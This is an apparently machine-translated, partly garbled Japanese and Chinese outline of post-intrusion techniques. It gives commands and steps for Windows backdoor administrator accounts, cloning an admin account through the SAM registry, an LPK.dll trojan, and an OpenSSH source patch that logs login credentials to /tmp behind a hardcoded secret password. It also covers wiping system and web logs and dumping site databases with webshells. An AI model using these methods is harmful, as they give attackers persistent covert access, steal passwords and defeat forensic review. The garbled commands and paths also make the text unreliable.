浸透した後、
次の侵入を容易にするため、バックドアを残します
クリーンアップ・トレース
テスト・データベースライブラリオフ
ソースパッケージ
Windowsは、バックドアをインストールします
バックドアアカウント(ユーザーのバックドア)
LPKバックドア(裏口)
トロイの木馬、バックドア(裏口)
アカウントバックドア
ネットユーザー
$ /アドオンネットユーザー
ネットlocalgrop管理者/アドオン
support_338945aoアカウントクローン1は、最初にパスワードを設定します
レジストリレジストリエディターを開きます。
HKET_LOCAL_MACHINE-ASM-SAM-ドメインユーザー名
管理者を検索するには、管理者の開放F値は、すべてのレプリケート
クローンアカウントを見つけ、開放F値、貼り付け置き換えを選択するには
なぜクローンアカウント
1、最初に、ユーザーがコンピュータにログオンしたとき、Cになります:\ドキュメントや設定の記録があります
リモートログインアカウントの作成後、それはホームディレクトリを作成し、
しかし、ログインアカウントをクローニングした後、このような状況を持っていません。
LPKバックドア
LPK.dllを生成します
バックドア型トロイの木馬
Linuxは、バックドアをインストールします
タールzxvfのopenssh-5.9p1.tar.gz
タールzxvf Ox06-0penssh-5.9p1.patch.tar.gz
CDのopenssh-5.9p1.patch /
CP sshbd5.9p1.diff ../openssh-5.9p1
CD ../openssh-5.9p1
パッチ<sshbd5.9p1.diff //パッチ、バックドア
VI includes.h //修正バックドアパスワード、ログファイルの場所
/ *
+#ILOGの定義「を/ tmp / ILOG」//マシンのユーザ名とパスワードへのログオンを記録
+#define OLOG “/tmp/olog” //记录本机登录到远程的用户名和密码
+#define SECRETPW “123456321” //后门密码
*/
先安装所需环境
yum install –y openssl openssl-devel pam-devel
./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kerberos5
注意,要是出现:
configure:error:*** zlib.h missing –please install first or check config.log
需要安装zlib
yum install –y zlib zlib-devel //http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download
需要make clean
make && make install //编译和安装
serrice sshd restart //重启sshed
然后登录
Windows系统日志清除
扫描/访问日志-都是和网站进行交互-记录在访问日志
上传后门-看文件日期
我的电脑-管理-事件查看器-安全性-审核成功
网站日志-网站-属性-日志
文件目录
Linux系统日志清除
历史命令
访问日志:
ls /var/log/httpd/access_log
ls /etc/httpd/logs/access_log
源码打包
asp+access
asp+sqlserver
大马中的服务器打包
脱库
菜刀、大马、脱裤马、、、